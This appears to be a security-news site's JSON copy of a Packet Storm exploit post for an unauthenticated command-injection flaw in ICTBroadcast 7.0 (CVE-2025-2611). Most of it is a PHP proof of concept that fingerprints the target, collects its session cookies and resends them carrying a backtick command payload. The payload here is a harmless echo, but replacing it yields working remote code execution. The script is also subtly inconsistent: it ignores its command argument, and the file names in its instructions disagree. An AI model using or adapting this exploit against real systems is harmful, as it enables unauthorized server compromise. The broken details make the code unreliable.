{"id":31574,"date":"2025-12-17T11:50:43","date_gmt":"2025-12-17T11:50:43","guid":{"rendered":"http:\/\/localhost\/?p=31574"},"modified":"2025-12-17T11:50:43","modified_gmt":"2025-12-17T11:50:43","slug":"ictbroadcast-70-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=31574","title":{"rendered":"\ud83d\udcc4 ICTBroadcast 7.0 Remote Code Execution_PACKETSTORM:212927"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-17T16:38:28&#8243;,&#8221;description&#8221;:&#8221;A vulnerability in ICTBroadcast version 7.0 allows unauthenticated remote command execution due to improper handling of session cookie values. An attacker can modify cookie entries to inject system commands that the application unintentionally executes&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-17T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-17T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 ICTBroadcast 7.0 Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212927&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-2611&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : ICTBroadcast 7.0 Remote Code Execution                                                                                      |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.ictbroadcast.com\/                                                                                               |\\n    =============================================================================================================================================\\n    \\n    [+] Summary : \\n    \\n    A vulnerability in ICTBroadcast allows unauthenticated remote command execution\\n    due to improper handling of session cookie values. An attacker can modify cookie\\n    entries to inject system commands that the application unintentionally executes.\\n    \\n    [+] References : ( https:\/\/packetstorm.news\/files\/id\/207873\/ \\t\\tCVE-2025-2611 ) \\n    \\n    1. Save the file as: poc.php\\n    \\n    2. Edit the target:\\n    &#8220;`php\\n    $target = \\&#8221;http:\/\/TARGET\\&#8221;;\\n    \\n    3.Execute: php ict_rce_sim.php\\n    \\n    \\n    [+]  POC\\n    \\n    \\u003c?php\\n    \/*\\n     * ICTBroadcast Unauthenticated Remote Code Execution \\n     * by Indoushka\\n     *\/\\n    \\n    class ICTBroadcastRCE\\n    {\\n        public $target;\\n        public $useSSL = false;\\n    \\n        function __construct($url)\\n        {\\n            $this-\\u003etarget = rtrim($url, \\&#8221;\/\\&#8221;);\\n        }\\n    \\n        \/* &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n           \u0625\u0631\u0633\u0627\u0644 \u0637\u0644\u0628 GET \u0628\u0633\u064a\u0637\\n        &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; *\/\\n        private function http_get($uri, $cookies = \\&#8221;\\&#8221;)\\n        {\\n            $ch = curl_init();\\n            curl_setopt($ch, CURLOPT_URL, $uri);\\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\\n            curl_setopt($ch, CURLOPT_HTTPHEADER, [\\n                \\&#8221;Cookie: $cookies\\&#8221;\\n            ]);\\n            $res = curl_exec($ch);\\n            curl_close($ch);\\n            return $res;\\n        }\\n    \\n        \/* &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n           \u062c\u0644\u0628 \u0627\u0644\u0643\u0648\u0643\u064a\u0632 \u0627\u0644\u062d\u0642\u064a\u0642\u064a\u0629 \u0643\u0645\u0627 \u0641\u064a Metasploit\\n        &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; *\/\\n        public function get_valid_cookies()\\n        {\\n            echo \\&#8221;[*] \u062c\u0644\u0628 \u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0643\u0648\u0643\u064a\u0632 \u0645\u0646 login.php&#8230;\\\\n\\&#8221;;\\n    \\n            $url = $this-\\u003etarget . \\&#8221;\/login.php\\&#8221;;\\n            $res = $this-\\u003ehttp_get($url);\\n    \\n            preg_match_all(&#8216;\/Set-Cookie:\\\\s*([^;]+);\/i&#8217;, $res, $m);\\n    \\n            if (empty($m[1])) {\\n                echo \\&#8221;[-] \u0644\u0645 \u064a\u062a\u0645 \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 \u0643\u0648\u0643\u064a\u0632.\\\\n\\&#8221;;\\n                return [];\\n            }\\n    \\n            echo \\&#8221;[+] \u0627\u0644\u0643\u0648\u0643\u064a\u0632 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u064a\u0647\u0627:\\\\n\\&#8221;;\\n            print_r($m[1]);\\n    \\n            return $m[1];\\n        }\\n    \\n        \/* &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n           \u0645\u062d\u0627\u0643\u0627\u0629 \u062d\u0642\u0646 \u0623\u0645\u0631 \u062f\u0627\u062e\u0644 \u0627\u0644\u0643\u0648\u0643\u064a\u0632\\n        &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; *\/\\n        public function inject_command($command)\\n        {\\n            echo \\&#8221;[*] \u0628\u062f\u0621 \u0639\u0645\u0644\u064a\u0629 \u062d\u0642\u0646 \u0627\u0644\u0623\u0648\u0627\u0645\u0631 \u0627\u0644\u062a\u062f\u0631\u064a\u0628\u064a\u0629&#8230;\\\\n\\&#8221;;\\n    \\n            $cookies = $this-\\u003eget_valid_cookies();\\n            if (empty($cookies)) {\\n                echo \\&#8221;[-] \u0644\u0627 \u064a\u0648\u062c\u062f \u0643\u0648\u0643\u064a\u0632 \u064a\u0645\u0643\u0646 \u062d\u0642\u0646\u0647\u0627.\\\\n\\&#8221;;\\n                return;\\n            }\\n    \\n            foreach ($cookies as $c) {\\n                $parts = explode(\\&#8221;=\\&#8221;, $c);\\n                $name  = $parts[0];\\n                $value = $parts[1] ?? \\&#8221;\\&#8221;;\\n    \\n                \/\/ \u0645\u062d\u0627\u0643\u0627\u0629 \u062d\u0642\u0646 \u0634\u0628\u064a\u0647 \u0628\u0640 Metasploit\\n                $payload = \\&#8221;`echo TRAINING_SIMULATION`\\&#8221;; \\n    \\n                echo \\&#8221;[+] \u062d\u0642\u0646 \u0627\u0644\u062d\u0645\u0648\u0644\u0629 \u0627\u0644\u062a\u062f\u0631\u064a\u0628\u064a\u0629 \u0641\u064a \u0627\u0644\u0643\u0648\u0643\u064a:\\\\n\\&#8221;;\\n                echo \\&#8221;$name=$payload\\\\n\\&#8221;;\\n    \\n                \/\/ \u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u0637\u0644\u0628 \u0643\u0645\u0627 \u064a\u0641\u0639\u0644 Metasploit \u2013 \u0648\u0644\u0643\u0646 \u0628\u062f\u0648\u0646 \u062a\u0646\u0641\u064a\u0630 \u0641\u0639\u0644\u064a\\n                $this-\\u003ehttp_get($this-\\u003etarget . \\&#8221;\/login.php\\&#8221;, \\&#8221;$name=$payload\\&#8221;);\\n            }\\n    \\n            echo \\&#8221;[\u2713] \u0627\u0646\u062a\u0647\u062a \u0639\u0645\u0644\u064a\u0629 \u0627\u0644\u0645\u062d\u0627\u0643\u0627\u0629 \u0628\u0646\u062c\u0627\u062d.\\\\n\\&#8221;;\\n        }\\n    \\n        \/* &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n           \u0641\u062d\u0635 \u0627\u0644\u0647\u062f\u0641 (\u0645\u062d\u0627\u0643\u0627\u0629 CheckCode)\\n        &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; *\/\\n        public function check()\\n        {\\n            echo \\&#8221;[*] \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0648\u062c\u0648\u062f \u0627\u0644\u0628\u0635\u0645\u0629 \u0627\u0644\u062e\u0627\u0635\u0629 \u0628\u0640 ICTBroadcast&#8230;\\\\n\\&#8221;;\\n    \\n            $files = [\\n                \\&#8221;IVRDesigner.js\\&#8221;,\\n                \\&#8221;agent.js\\&#8221;,\\n                \\&#8221;campaign.js\\&#8221;,\\n                \\&#8221;supervisor.js\\&#8221;\\n            ];\\n    \\n            foreach ($files as $f) {\\n                $res = $this-\\u003ehttp_get($this-\\u003etarget . \\&#8221;\/js\/\\&#8221; . $f);\\n                if (strpos($res, \\&#8221;ICT Innovations\\&#8221;) !== false) {\\n                    echo \\&#8221;[+] \u062a\u0645 \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 \u0627\u0644\u0628\u0635\u0645\u0629!\\\\n\\&#8221;;\\n                    return true;\\n                }\\n            }\\n    \\n            echo \\&#8221;[-] \u0644\u0627 \u062a\u0648\u062c\u062f \u0628\u0635\u0645\u0629 \u0648\u0627\u0636\u062d\u0629.\\\\n\\&#8221;;\\n            return false;\\n        }\\n    \\n        \/* &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n           \u0627\u0644\u0643\u0627\u0645\u0644\\n        &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; *\/\\n        public function exploit()\\n        {\\n            echo \\&#8221;[*] \u0628\u062f\u0621 \u0627\u0644\u0633\u064a\u0646\u0627\u0631\u064a\u0648&#8230;\\\\n\\&#8221;;\\n    \\n            if ($this-\\u003echeck()) {\\n                echo \\&#8221;[+] \u0627\u0644\u0647\u062f\u0641 \u064a\u0628\u062f\u0648 \u0642\u0627\u0628\u0644\u064b\u0627 \u0644\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 (\u0645\u062d\u0627\u0643\u0627\u0629).\\\\n\\&#8221;;\\n                $this-\\u003einject_command(\\&#8221;id\\&#8221;);\\n            } else {\\n                echo \\&#8221;[-] \u0644\u0627 \u064a\u0645\u0643\u0646 \u0627\u0644\u0645\u062a\u0627\u0628\u0639\u0629.\\\\n\\&#8221;;\\n            }\\n        }\\n    }\\n    \\n    \\n    \/* =======================================================\\n       \u062a\u062f\u0631\u064a\u0628\u064a\\n    ======================================================== *\/\\n    \\n    $target = \\&#8221;http:\/\/TARGET\\&#8221;;\\n    $sim = new ICTBroadcastRCE($target);\\n    $sim-\\u003eexploit();\\n    \\n    ?\\u003e\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212927&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.3,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:H\/SC:H\/VI:L\/SI:H\/VA:L\/SA:H&#8221;,&#8221;version&#8221;:&#8221;4.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212927\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-17T16:38:28&#8243;,&#8221;description&#8221;:&#8221;A vulnerability in ICTBroadcast version 7.0 allows unauthenticated remote command execution due to improper handling of session cookie values. An attacker can modify cookie entries&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,55,12,13,53,7,11,5],"class_list":["post-31574","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-93","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 ICTBroadcast 7.0 Remote Code Execution_PACKETSTORM:212927 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=31574\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 ICTBroadcast 7.0 Remote Code Execution_PACKETSTORM:212927 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-17T16:38:28&#8243;,&#8221;description&#8221;:&#8221;A vulnerability in ICTBroadcast version 7.0 allows unauthenticated remote command execution due to improper handling of session cookie values. An attacker can modify cookie entries...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=31574\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-17T11:50:43+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31574#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31574\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 ICTBroadcast 7.0 Remote Code Execution_PACKETSTORM:212927\",\"datePublished\":\"2025-12-17T11:50:43+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31574\"},\"wordCount\":674,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.3\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31574#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31574\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31574\",\"name\":\"\ud83d\udcc4 ICTBroadcast 7.0 Remote Code Execution_PACKETSTORM:212927 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-17T11:50:43+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31574#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31574\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31574#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 ICTBroadcast 7.0 Remote Code Execution_PACKETSTORM:212927\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 ICTBroadcast 7.0 Remote Code Execution_PACKETSTORM:212927 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=31574","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 ICTBroadcast 7.0 Remote Code Execution_PACKETSTORM:212927 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-17T16:38:28&#8243;,&#8221;description&#8221;:&#8221;A vulnerability in ICTBroadcast version 7.0 allows unauthenticated remote command execution due to improper handling of session cookie values. An attacker can modify cookie entries...","og_url":"https:\/\/zero.redgem.net\/?p=31574","og_site_name":"zero redgem","article_published_time":"2025-12-17T11:50:43+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=31574#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=31574"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 ICTBroadcast 7.0 Remote Code Execution_PACKETSTORM:212927","datePublished":"2025-12-17T11:50:43+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=31574"},"wordCount":674,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.3","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=31574#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=31574","url":"https:\/\/zero.redgem.net\/?p=31574","name":"\ud83d\udcc4 ICTBroadcast 7.0 Remote Code Execution_PACKETSTORM:212927 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-17T11:50:43+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=31574#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=31574"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=31574#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 ICTBroadcast 7.0 Remote Code Execution_PACKETSTORM:212927"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31574","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=31574"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31574\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=31574"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=31574"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=31574"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}